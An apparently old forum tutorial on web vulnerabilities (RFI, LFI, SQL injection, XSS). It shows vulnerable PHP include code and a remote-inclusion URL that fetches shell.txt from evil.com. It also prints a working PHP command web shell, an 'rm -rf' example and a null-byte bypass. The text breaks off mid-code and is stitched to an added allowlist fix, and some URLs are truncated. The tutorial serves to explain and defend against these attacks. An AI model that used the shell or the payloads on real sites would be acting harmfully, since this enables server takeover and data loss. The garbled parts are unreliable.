-= WebHacking
-= Intro
in this tutorial, we will discuss the vulnerabilities, what goes wrong on the developer's side, and some ways they get exploited...
Enjoy!!
Tutorial: [ Basic || 1 ]
+------------------------------------------+
|
| || Starter ||
|
+------------------------------------------+
Things to know:
=- Vulnerability : a security hole that can be exploited to change the way the webapp / software works.
=- CMSs and forums use databases to store info like users, posts, threads, messages and so on; it is usually a MySQL server.
=- RFI [ Remote File Inclusion ] : a malicious user can include 'bad' code from another server to be executed on the vulnerable site.
=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server that the web server process can read.
=- SQL Injection : injecting SQL into a query to bypass checks or get more info out of a database.
=- XSS [ Cross Site Scripting ] : if it is a permanent (stored) vulnerability, where the user's input is saved and shown to others, an attacker can log cookies, IPs, and much more...
=- Exploit : a script made to maliciously use a vulnerability.
+------------------------------------------+
|
| || What goes wrong ||
|
+------------------------------------------+
We are going to take each vulnerability and take a look at what went wrong on the web developer's side that made the script vulnerable...
=- RFI ::
RFIs are exploited by including 'bad' code from another site into the vulnerable site; for example, an attacker can include a PHP shell and execute commands on the server with it...
this vulnerability is very dangerous: a site affected by it can be compromised easily...
an example of code affected by an RFI:
Code:
<?php
$page = $_GET['page'];  // taken straight from the URL, never checked
if (isset($page))
{
    include($page);     // whatever the user supplied gets included
}
?>
as you can see, we take the variable page and include it. That script will work fine and do what it is supposed to do, for example:
www.example.com/index.dmz?page=contact.dmz
this would open contact.dmz, BUT, what would a malicious user do?
http://www.example.com/index.dmz?pag.../www.evil.com/ shell.txt?
the shell code must be in a .txt file: the attacker's server then serves it as plain text instead of running it, so the PHP inside it gets parsed / executed on the vulnerable site.
what happens then?
that text file gets included, so let's say shell.txt had the following
Code:
<?php
$command = $_GET['cmd'];
if ($command)
{
@system($command);
}
echo "
<form method='GET'>
<input type='text' name='cmd'>
<input type='submit' name='submit' value='Go!'>
</form>";
?>
a small text box would appear on the page, with a button, that would execute commands... the user can compromise the whole site using this simple text box, and if he had enough privileges he could run the following:
rm -rf
and delete your files...
some devs think they can fix the vulnerability by doing the following
Code:
<?php
if (isset($_GET['page']))
{
    $page = $_GET['page'] . ".php"; // extension appended after the isset() check, so the check actually tests the request
    include($page);                  // still vulnerable: the start of the path is fully attacker-controlled
}
?>
this way, you can only include .php files, which on its own does not seem like a big deal since PHP gets parsed on the server side...
but that won't stop some people: there is something called a NullByte, which tells PHP to ignore anything after it (this worked in PHP versions before 5.3.4, which started rejecting file paths that contain a null byte)... if someone wanted to exploit that code, he would do:
http://www.darkmindz.com/index.dmz?p...p://www.evil.c om/shell.txt?%00
as you can see, the [ %00 ] is the NullByte, and the path would get parsed this way:
Code:
<?php
if (isset($_GET['page']))
{
    $page = $_GET['page'] . ".php";
    include('http://www.evil.com/shell.txt?'); // ignoring anything after the NullByte, which in this case is the .php...
}
?>
so the question now is: how do you completely secure this URL system?!
well, you can use a switch statement; this way, anything other than the pages that are explicitly listed won't be included.. ex:
[code]<?php
if(isset($_REQUEST['page']))
{
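The allowlist idea behind that switch, written out as an added example (this is not the tutorial's own code; the page names and the pages/ directory are assumed):

```php
<?php
// Added example, not the tutorial's code. Assumed layout: pages/home.php,
// pages/about.php and pages/contact.php exist on the server.

// Map of permitted page names to the files they load. Only keys of this
// array can ever reach include(); the raw request value is never used as a path.
$allowed_pages = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

// Resolve a requested page name to a safe file path, or null if not allowed.
function resolve_page(array $allowed, $requested)
{
    // "http://...", "../etc/passwd" or a %00 can never equal an allowlist key,
    // so no separate filtering of the input is needed: unknown names fail closed.
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }
    return $allowed[$requested];
}

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = resolve_page($allowed_pages, $requested);

if ($file === null) {
    // Unknown page: refuse instead of including whatever was supplied.
    http_response_code(404);
    echo 'Page not found';
    exit;
}

// Same effect as a switch with one case per page: only a literal from the table is included.
include $file;
?>
```

As a second layer, setting allow_url_include = Off in php.ini stops include() from fetching remote URLs at all, so even a coding mistake elsewhere cannot pull in a file from another server.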